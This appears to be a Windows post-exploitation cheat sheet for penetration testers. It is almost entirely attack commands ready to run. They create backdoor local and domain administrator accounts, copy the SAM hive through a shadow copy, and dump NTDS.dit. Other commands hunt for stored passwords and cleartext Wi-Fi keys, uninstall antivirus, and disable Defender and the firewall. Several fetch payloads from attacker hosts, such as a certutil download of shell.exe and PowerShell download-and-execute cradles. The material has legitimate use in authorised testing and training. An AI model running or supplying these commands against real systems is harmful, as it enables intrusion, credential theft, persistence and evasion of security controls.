Windows post-exploitation

guides
, ,

Once you get access to Windows machine it is important to get as much as you can to continue your hacking journey.

commands

General commands

Here are some useful commands to execute once we are in:

whoami /all - Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.

systeminfo - Outputs a large amount of data about the system, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed.

qprocess * - Much like tasklist, but a bit easier to read. It has username, login method, session id, pid, and binary name.

net config workstation - This will display information such as NetBIOS name, the full computer name, Username (of the user executing this command), Domain, Workgroups, and more.

net user test 12345678 /add - create local user called test wit password 12345678.

net localgroup administrators /add test or net localgroup administrators test /add - adds the new user test to the local administrators group.

dir /s pass == key == vnc == .config - search for keywords.

findstr /si pass *.xml *.ini *.txt - search for string.

reg query HKLM /f pass /t REG_SZ /s and reg query HKCU /f pass /t REG_SZ /s - search for registry string.

netsh wlan show profile - Wifi AP SSID.

netsh wlan show profile <SSID> key=clear - clear text pass for wifi.

System files to pull

Gets much as you can for offline analysis:

%SYSTEMDRIVE%\pagefile.sys - Large file, but contains spill over from RAM, usually lots of good information can be pulled. - Analyze this file using FTK Imager.

%SYSTEMROOT%\repair\SAM and %SYSTEMROOT%\System32\config\RegBack\SAM - Stores user passwords in either an LM hash and/or an NTLM hash format - extract hashes using samdump2 samdump2 SYSTEM SAM > hashes.txtand pwdump pwdump system sam.

1
2
3
4
5
6
$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject) \windows\system32\config\sam" C:\Users\Public
$voume.Delete();if($notrunning -eq 1){$service.Stop()}

%SYSTEMROOT%\repair\system and %SYSTEMROOT%\System32\config\RegBack\system - This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system - same as above use samdump2 or pwdump.

%USERPROFILE%\ntuser.dat - User-level Windows registry settings - analyzes using RegRipper.

%SYSTEMROOT%\config\SAM and %SYSTEMROOT%\config\SOFTWARE and %SYSTEMROOT%\config\SECURITY and %SYSTEMROOT%\config\SYSTEM - registry hives analyze using RegRip or hivexsh.

%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat - Internet Explorer web browser history file. Use the pasco tool to parse and view the contents of these files and use grep to filter the output on the date you are interested in. pasco 'index.dat' | grep ’04/28’ | less

%WINDIR%\System32\drivers\etc\hosts - System hosts file for local translation of host names to IP addresses.

Other interesting files

Of course, all files of various programs. Such as Outlook files with the .pst extension containing email messages or Keepass .kxdb files containing user passwords.

It’s best to list all installed programs and browse their folders for configuration files or files that store data from those programs. Additionally, you can search for office and text documents. Although this is an unbelievable situation, many users will still keep their passwords in .txt or .docx files on the desktop in a file e.g. called passwords.txt. [SIC!]

To list all installed software you can use PowerShell command:

1
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize > C:\InstalledProgramsPS.txt

Non interactive uninstalling software

You can use this for example to uninstall antivirus software.

wmic product get name /value - this gets software names

wmic product where name="software_name" call uninstall /Interactive:Off - this uninstalls software

Basic CMD

Version and Patches info

1
2
3
4
5
6
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
hostname
DRIVERQUERY #3rd party driver vulnerable?

Mounted disks

1
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)

AV

1
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

Processes, Services & Software

1
2
3
4
5
6
7
8
9
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software

Domain info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs connected to the domain
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
net group "Domain Controllers" /domain #List PC accounts of domains controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password policy
nltest /domain_trust #Mapping of the trust relationships.

Users

1
2
3
4
5
6
7
8
9
10
11
12
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
net users #All users
dir /b /ad "C:\Users\"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
qwinsta #Anyone else logged in?
cmdkey /list #List credential
net user /add [username] [password] #Create user

::Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

Groups

1
2
3
4
5
6
7
8
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
new localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group

List sessions

1
2
qwinsta
klist sessions

Persistence with user

1
2
3
4
5
6
7
8
9
10
11
12
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName  /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

Network

1
Interfaces, Routes, Ports, Hosts and DNSCache

Firewall

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
netsh firewall show state # FW info, open ports
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off
NetSh Advfirewall set allprofiles state on  #Trun On
netsh firewall set opmode disable #Turn Off

::How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop" 

::Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

::Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Shares

1
2
3
4
net view #Get a list of computers
net view \\computer #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

Wifi

1
2
netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass

Copying NTDS.dit using Ntdsutil

1
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit

Misc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file

#Download
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden

#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

Basic PowerShell

Download and execute

1
2
3
powershell "IEX(New-Object Net.WebClient).downloadString('http://example.com:8080/test_script.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://example.com:8080/test_script.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://example.com:8080/test_script.ps1')|iex"

Using b64 from linux

1
2
echo -n "IEX(New-Object Net.WebClient).downloadString('http://example.com:8080/test_script.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>

Enable WinRM (Remote PS)

1
enable-psremoting -force

Disable Defender

1
2
From a PS as authority system
Set-MpPreference -DisableRealtimeMonitoring $true

PS-History

1
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.tx

OS version and HotFixes

1
2
3
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Other connected drives

1
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

Users

1
2
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name

Groups

1
2
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators

SUDO

1
2
3
4
5
6
7
8
9
10
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred


Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'

Clipboard

1
Get-Clipboard

Processes

1
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Services

1
Get-Service

Network interfaces

1
2
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

ARP

1
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

Hosts

1
Get-Content C:\WINDOWS\System32\drivers\etc\hosts

SNMP

1
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse